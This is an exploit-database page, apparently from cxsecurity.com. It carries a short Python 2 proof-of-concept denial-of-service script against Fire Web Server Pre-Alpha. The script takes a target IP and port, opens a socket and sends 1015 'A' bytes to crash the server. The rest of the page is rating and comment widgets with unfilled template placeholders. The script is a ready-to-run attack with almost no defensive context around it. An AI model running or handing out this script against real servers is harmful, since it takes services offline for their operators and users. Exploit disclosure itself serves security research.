Fire Web Server Pre-Alpha Denial Of Service

2020.06.29
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

#!/usr/bin/python ''' # Exploit Title: Fire Web Server (Pre-Alpha) - Remote Denial of Service (PoC) # Date: 2020-Jun-26 # Exploit Author: Saeed reza Zamanian # Vendor Homepage: https://sourceforge.net/projects/firewebserver/ # Software Link: https://sourceforge.net/projects/firewebserver/files/ # Version: Pre-Alpha # Tested on: Windows 7 , Windows Vista ''' import socket,os,sys if len(sys.argv) < 3: print "Usage: python fwspa_dos.py targetIP targetPort" else: print "[*] Sending evil http request to target" expl = socket.socket ( socket.AF_INET, socket.SOCK_STREAM ) expl.connect((sys.argv[1], int(sys.argv[2]))) expl.send("A"*1015) expl.close()


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top